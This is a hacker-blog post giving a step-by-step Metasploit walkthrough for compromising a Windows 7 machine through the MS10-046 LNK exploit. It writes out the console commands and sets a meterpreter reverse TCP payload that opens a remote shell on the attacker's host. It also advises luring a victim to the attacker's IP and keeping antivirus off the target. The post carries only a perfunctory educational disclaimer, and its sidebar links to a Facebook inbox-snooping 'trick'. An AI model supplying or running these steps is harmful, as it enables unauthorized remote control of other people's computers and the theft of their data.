➰METASPLOIT: Hacking windows 7 exploit...💀
➰Hey Guys. I will be giving a quick dirty how-to of exploiting a windows velunurbility to login to remove system with out username and password using Metasploit
Requirements:➰💀
1⃣. MetaSploit Installed (Preferably BackTrac)
2⃣. Ruby Installed (Install all the package of Ruby to avoid any issues)
3⃣. Two OS running either on same as virtual or physically different
4⃣. Target host must not be running any AV
Here are the quick Steps.
SCENARIO:
Machine 1⃣: Host Linux Machine
Machine 2⃣: Target Windows 7 Machine
Step 1⃣:
Download and Install Metasploit Framework Source Code on the Machine 1. I prefer downloading from SVN. run the given below command on CLI
svn co https://www.metasploit.com/svn/framework3/trunk/
OR
Download directly from here:http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
Step 2⃣:
Locate the file msfconsole. In my case it was under /opt/framework-x.x.x/app
Run it as ruby msfconsole
Step 3⃣:
Now once you get the msf> prompt type the below command
search LNK
and look for the module exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Step 4⃣:
Now once we have found the desired module we will use this exploit by typing the below command
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
Once loaded your msf prompt should be inclusive of the loaded exploit. given below is the image
Step5⃣ :
Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload
set payload windows/meterpreter/reverse_tcp
Step 6⃣:
Now its time to do some configuration for the exploit/payload that we have just set. type the given command
show options
You should get below default output.
Step 7⃣:
Now we have to set the local host to listen. Type the given below two commandsi
set SRVHOST x.x.x.x ( This will be your HOST IP address running metasploit )
Then run
set LHOST x.x.x.x ( This will be also be your HOST IP address running metasploit)
Step 8⃣:
Now check if the above applied configuration is applied
Step 9⃣:
Now Finally we will start to exploit. Run the command Exploit
Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)
Step 🔟:
On any Client machine simply open Internet Explorer and try to open http://x.x.x.x (IP of the MetaSploit server)
Note: it will give your a pop-up asking from permission click ALLOW.
**Make sure you do not have any AntiVirus running on the target PC
Step 1⃣1⃣:
Once connection is established you should see something like below
Step 1⃣2⃣:
You can check the number of successful connected session by running the command sessons in msf console
Step 1⃣3⃣:
Now as we can see that we have one victim connected its time to login to the system. run the command session –i 1
Once connected type linux command to browse inside the System..Enjoy
Final Step:
This Documentation is purely for educational purpose. using it ethically or viciously its your individual act .
Use it responsibly...
🎭🎭 !n5!d3 h4(k3r 🎭🎭
Recent Posts
PressRelease : Complete Document Of link Of BCC11 Dec 20205On this page, you will find collections of all links to bestcarcolor.com Sr No. Link Website name...[...]
- 24 whtatsapp for one device16 Mar 20170
1)<~~WhatsApp Reborn 1.95 Base: 2.12.73 Link : http://www.mediafire.com/?un9imfomet8yo0o ______...[...]
- Trick To Read Your Friends Inbox Messages In Facebook23 Jun 20150
Trick To Read Your Friends Inbox Messages In Facebook give this link to your friend and say "open...[...]
- change your facebook name before 60 days23 Jun 20150
Facebook only allow you to change your Name after 60 days. You don't be able to Change that. No...[...]
- what is dos23 Jun 20150
what is dos ?? A: Denial of Service (DoS) attackes are aggressive attacks on an individual Compute...[...]
Subscribe to:
Post Comments (Atom)
Post a Comment
EmoticonClick to see the code!
To insert emoticon you must added at least one space before the code.